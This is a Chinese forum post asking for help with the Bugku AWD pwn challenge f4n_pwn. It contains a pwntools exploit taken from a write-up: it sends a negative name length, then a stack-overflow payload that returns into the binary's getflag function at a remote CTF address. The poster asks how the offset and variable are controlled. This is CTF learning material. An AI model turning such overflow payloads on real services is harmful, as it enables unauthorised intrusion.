本帖最后由 sweety 于 2021-9-12 19:09 编辑
最近打bugku的awd,pwn机上的题目,原题已贴
在main函数跟进read_name函数,里面有两个洞,源程序含有getflag的函数
pwn题f4n_pwn的payload求解惑
这个栈溢出,我先用cyclic计算偏移,发现报错,后用pattern.py计算出是107,但是都拿不到flag
遂上网找wp,但还是看不懂payload...
exp
from pwn import *
p = remote("114.116.54.89",10011)
p.recvuntil("input your name length : \n")
p.sendline("-1")
payload = 'a'*(0x60-0xc) + 'c' + p32(0x080486BB)
p.recvuntil("please tell me your name : \n")
p.sendline(payload)
p.interactive()
pwn题f4n_pwn的payload求解惑
这里控制i的值实在是想不通,而且这条payload的偏移是87
原题:
链接:https://pan.baidu.com/s/1cXbluxV4MHTngEr1pcrtkw
提取码:9wo0
我知道答案
回答被采纳将会获得
1 荣耀
+
7 学币
已有1人回答
|